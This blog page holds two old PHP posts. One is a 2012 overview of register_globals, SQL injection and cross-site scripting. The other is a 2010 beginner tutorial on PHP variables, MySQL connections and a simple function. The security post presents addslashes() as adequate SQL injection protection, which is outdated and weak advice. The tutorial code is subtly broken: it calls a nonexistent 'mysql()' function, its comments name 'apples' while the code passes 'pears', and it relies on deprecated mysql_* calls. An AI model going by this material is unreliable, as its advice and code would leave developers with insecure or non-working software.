Posted by: Shofiur Rahman

Posted on: July 11, 2012 4:13 pm

-

Every day hackers are discovering new exploits and hacking techniques. We can defend some categories of attacks in our PHP script.

Abusing register_globals

It is a setting in php.ini that controls the auto population of variables with the same name as form elements or cookies. If register_globals set to on then it may bring a disaster for your website.

Since PHP 4.2.0, the default value for register_globals is off. But often web hosts will re-enable register_globals to provide compatibility with older scripts. We can get clear concept of register_globals on or off with the following example.

Suppose username is a form element. With register_globals ‘off’, the only way to get the value of this form element using $_POST or $_GET array, depending on form action method. On the other hand, when register_globals is ‘on’, the username field value is accessible using $_POST, $_GET and $username as well.

If you are not able to disable register_globals in php.ini, you can turn it off use an .htaccess file.

php_flag register_globals off

SQL Injection Attacks

SQL injection attacks are simply the inclusion of malicious SQL statements in the place of what should normally be inoffensive data. SQL injection preys on a lack of input scrubbing and data validation.

SQL injection is fairly avoidable with an insignificant preparation and thorough coding practices. If magic_quotes_gpc is enabled, PHP automatically escapes any escape characters (e.g. apostrophes). Unluckily, this activities is applied to all GET, POST and Cookie variables in spite of whether they are going to used in a SQL statement or not. Most of the time it can be annoying. To make sure the data is escaped only when we need it to be, we can turn off magic_quotes_gpc in php.ini, and use addslashes() on all data that is being passed to MySQL. The addslashes() function will automatically escape any unsafe characters so our input will not choke MySQL.

Cross-Site Scripting

Cross-Site Scripting abbreviated XSS, cross-site scripting is the abuse of unfiltered dynamic output, where the invader has the skill to add or change the page’s generated markup. Most commonly, this means the addition of a small bit of JavaScript to the output of a page, which then does something ominous, such as trick another user into revealing their login credentials or credit card information, or possibly divulging cookie or session information for immediate account compromise.

Posted by: SEO Positive

Posted on: May 12, 2010 8:46 am

-

Today we are going to expand more on PHP Variables and introduce the define() function as well as touch base with MySQL And getting you connected to a database.

The requirements for todays tutorial are:

  • PHP Server with PHP 5+
  • MySQL Access with all privilages
  • Testing platform (Virtual Server, PHP Hosting)
  • Text authoring software to edit your files

As usual all code can be downloaded via the link at the bottom of the post.

MySQL Code

//resource one
$connect1 = mysql_connect('localhost','test','test');
mysql_select_db('test', $connect1);

//resource 2
$connect2 = mysql('localhost','test2','test2');
mysql_select_db('test2',$connect2);

//simple query using resource #1
mysql_query("select * from `test`", $connect1);

//simple query using resource #2
mysql_query("select * from `test2`", $connect2);

PHP Function

function feedMe($food)
{
	if($food == 'cookies')
	{
		return 'Yummy thank you very much for the cookie';
	}
	else
	{
		return "Yuk! I don't like {$food}, I want cookies.";
	}
}
//feed me apples
echo feedMe('pears');
//will output Yuk! I don't like apples, I want cookies.

//feed me cookies
echo feedMe('cookies');
//will output Yummy thank you very much for the cookie

Download Zipped Source

Tomorrow we will look at handling user input data using PHP and XHTML using POST and GET methods

Authors
Categories
Archives
Blogroll